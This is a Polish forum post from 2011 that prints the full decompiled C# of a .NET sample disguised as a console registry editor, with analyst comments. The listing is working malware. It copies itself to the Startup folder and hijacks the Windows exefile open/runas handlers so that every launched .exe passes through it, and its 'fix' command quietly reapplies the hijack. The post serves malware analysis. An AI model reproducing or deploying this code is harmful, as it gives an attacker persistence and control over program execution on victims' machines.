25.08.2011, 18:05
Napisałem do xylitola o analizę, odpisał mi, że ten plik korzysta z .NET, i analiza:
Kod:
// NOTE(review): decompiled listing of the sample discussed above, annotated for
// analysis only. The class presents itself as a console registry browser, but
// Main() runs doEvil() before any user interaction: it copies itself into the
// user's Startup folder and rewrites the HKCR\exefile shell handlers so that this
// binary is placed in front of every .exe started through the shell. Persistence
// and hijack are in doEvil()/RegEdit(); the interactive part is Crawl()/LoopBack().
internal class VMain
{
// Fields
// Hard-coded to true, so every branch guarded by beEvil is live and the benign
// handler value below is never selected.
private static bool beEvil = true;
// Root for the interactive browser (HKEY_CLASSES_ROOT); also what "back" resets to.
private static RegistryKey def = Registry.ClassesRoot;
// Replacement command line for the exefile handlers. With beEvil == true this is
// "<path of this assembly>" %*, i.e. the sample is invoked with the original
// target and arguments appended. The standard handler "\"%1\" %*" is only the
// dead branch. CodeBase.Substring(8) strips the leading "file:///".
private static string gene = (!beEvil ? "\"%1\" %*" : ("\"" + Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8) + "\" %*"));
// Hijack targets under HKCR: the open and runas command keys for .exe files.
// Each appears twice because two value names per key are written (see nukeVal).
private static string[] nuke = new string[] { @"exefile\shell\open\command", @"exefile\shell\runas\command", @"exefile\shell\open\command", @"exefile\shell\runas\command" };
// All targets live under HKCR.
private static RegistryKey[] nukePos = new RegistryKey[] { Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot };
// Every target receives the same replacement (gene) — there is no "restore" value.
private static object[] nukeRep = new object[] { gene, gene, gene, gene };
// Value names written: "IsolatedCommand" for the first two entries, the (Default)
// value ("") for the last two. Overwriting (Default) is what changes how .exe
// files are launched; IsolatedCommand is written as well.
private static string[] nukeVal = new string[] { "IsolatedCommand", "IsolatedCommand", "", "" };
// Current key of the interactive browser; starts at HKCR.
private static RegistryKey reg = def;
// Methods
// Reads one command from stdin and dispatches it. Commands: "back", "all [prefix]",
// "set|name|value", "fix", "about", "help". Anything that is not back/all/set —
// including fix/about/help, because the subkey search at the bottom sits inside the
// same else block — additionally tries to navigate into the first subkey whose name
// starts with the input.
private static void Crawl()
{
string str = Console.ReadLine();
// Only "back" is matched case-insensitively; every other command is case-sensitive.
if (str.ToLower() == "back")
{
reg = def;
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "all"))
{
// "all" with no argument is padded so that Substring(4) below is an empty prefix.
if (str.Length == 3)
{
str = "all ";
}
// Lists subkeys of the current key whose name starts with the text after "all ".
foreach (string str2 in reg.GetSubKeyNames())
{
if ((str2.Length >= (str.Length - 4)) && (str2.Substring(0, str.Length - 4) == str.Substring(4)))
{
Console.WriteLine(str2);
}
}
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "set"))
{
// Writes a value in the current key. No argument-count check: "set" with fewer
// than two '|' separators throws IndexOutOfRangeException (caught in Main, which
// then exits).
string[] strArray2 = str.Split(new char[] { char.Parse("|") });
reg.SetValue(strArray2[1], strArray2[2]);
}
else
{
// "fix" claims to restore the standard exefile handler, but RegEdit() writes
// nukeRep, which is gene — i.e. it re-applies the hijack with this binary's path.
if ((str.Length >= "fix".Length) && (str == "fix"))
{
RegEdit();
Console.WriteLine("Re-set exe run arguements.");
}
else if (str == "about")
{
Console.WriteLine("This is a simple command-line regedit by chc4, because he got bored one day.");
Console.WriteLine("It is written in C#, terribly inefficient, and I have no idea why you would use");
Console.WriteLine("this over regedit.exe");
Console.WriteLine("-8/23/2011");
}
else if (str == "help")
{
Console.WriteLine("back - Returns you to the Classes Root directory.");
Console.WriteLine("all [sub] - Searches the current directory for sub.");
Console.WriteLine("set|value|newvalue - Sets the value of the key ''value'' in the current directory.");
Console.WriteLine("fix - Re-sets standard exefile run arguments, for those nasty rogues.");
Console.WriteLine("help - Display this message.");
Console.WriteLine("Anything else will do a search for the queury in the current directory, if found will goto new directory.");
}
// Prefix search over subkeys of the current key; the first match becomes the
// current key, opened writable. Runs for fix/about/help too (see method comment).
foreach (string str3 in reg.GetSubKeyNames())
{
if ((str3.Length >= str.Length) && (str3.Substring(0, str.Length) == str))
{
reg = reg.OpenSubKey(str3, true);
return;
}
}
}
}
// Persistence + hijack. Runs unconditionally from Main() before the prompt appears.
// Marker file: C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe.
// If it is absent, the running assembly is copied there (overwrite = true) and the
// exefile handlers are rewritten via RegEdit(). The user name is taken from the
// part of WindowsIdentity.Name after the first backslash (DOMAIN\user form); a name
// without a backslash would throw IndexOutOfRangeException. The profile root is
// hard-coded to C:\Users — presumably Vista+ layout only; not derived from the
// environment. The ''\\'' spelling below looks like forum mangling of '\\'.
private static void doEvil()
{
if (beEvil && !File.Exists(@"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe"))
{
File.Copy(Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8), @"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe", true);
RegEdit();
}
}
// Interactive loop implemented as unbounded recursion: print current key, run one
// command, print a separator, recurse. There is no exit command; each iteration
// adds a stack frame.
private static void LoopBack()
{
Console.WriteLine(">" + reg.Name);
Crawl();
Console.WriteLine("--------------------");
LoopBack();
}
// Entry point. Order matters for analysis: the writable open of HKCR\exefile acts
// as a privilege probe (its result is discarded; a SecurityException lands in the
// "run as Administrator" handler), then doEvil() installs persistence and the
// handler hijack, and only then does the browser loop start.
public static void Main(string[] arg)
{
Console.Title = "IceFire (cmdLine regedit, chc4)";
try
{
Registry.ClassesRoot.OpenSubKey("exefile", true);
doEvil();
LoopBack();
}
catch (SecurityException)
{
Console.WriteLine("Please run as Administrator.");
Console.ReadLine();
// NOTE(review): Process.Close() releases the Process object's handle; whether it
// is meant to terminate the process is unclear — Main returns right after anyway.
Process.GetCurrentProcess().Close();
}
catch (Exception exception)
{
// Any other failure (e.g. IndexOutOfRange from "set" or doEvil) ends up here;
// the message is printed and the program ends after a keypress.
Console.WriteLine("Error:" + exception.Message + exception.ToString());
Console.ReadLine();
Process.GetCurrentProcess().Close();
}
}
// Applies the handler hijack: for each entry in nuke, opens the HKCR key writable
// and sets nukeVal[i] (IsolatedCommand or (Default)) to nukeRep[i] (gene, this
// binary's path + " %*"). Called both from doEvil() on first run and from the
// "fix" command. OpenSubKey returns null for a missing key, which would throw
// NullReferenceException into Main's generic handler.
private static void RegEdit()
{
for (int i = 0; i < nuke.Length; i++)
{
nukePos[i].OpenSubKey(nuke[i], true).SetValue(nukeVal[i], nukeRep[i]);
}
}
}